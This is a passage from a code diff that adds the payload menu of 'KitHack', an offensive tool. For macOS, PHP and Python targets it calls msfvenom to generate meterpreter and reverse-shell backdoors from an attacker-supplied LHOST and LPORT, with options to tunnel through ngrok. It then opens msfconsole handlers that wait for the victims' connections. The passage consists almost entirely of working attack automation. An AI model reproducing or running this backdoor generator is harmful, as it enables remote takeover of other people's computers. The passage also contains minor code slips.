DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '02': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.macho'.format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '03': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.macho'.format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '04': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.macho'.format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '05': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p osx/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.macho'.format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '06': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p osx/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.macho'.format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif sys == '05': + print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} php/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[02]{1} php/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[03]{1} php/reverse_php'.format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = tool.zfill(2) + + if pay == '01': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p php/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.php'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + if pay == '02': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.php'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '03': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p php/reverse_php LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.php'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/reverse_php; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/reverse_php; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif sys == '06': + print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) + print( + '{0}[01]{1} python/meterpreter_reverse_http'.format(WHITE, YELLOW)) + print( + '{0}[02]{1} python/meterpreter_reverse_https'.format(WHITE, YELLOW)) + print('{0}[03]{1} python/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[04]{1} python/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[05]{1} python/shell_reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[06]{1} python/shell_reverse_tcp_ssl'.format(WHITE, YELLOW)) + print('{0}[07]{1} python/shell_reverse_udp'.format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == '01': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p python/meterpreter_reverse_http LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.py'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_http; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '02': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p python/meterpreter_reverse_https LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.py'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_https; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '03': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p python/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.py'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '04': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.py'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '05': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p python/shell_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.py'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '06': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p python/shell_reverse_tcp_ssl LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.py'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '07': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p python/shell_reverse_udp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.py'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not 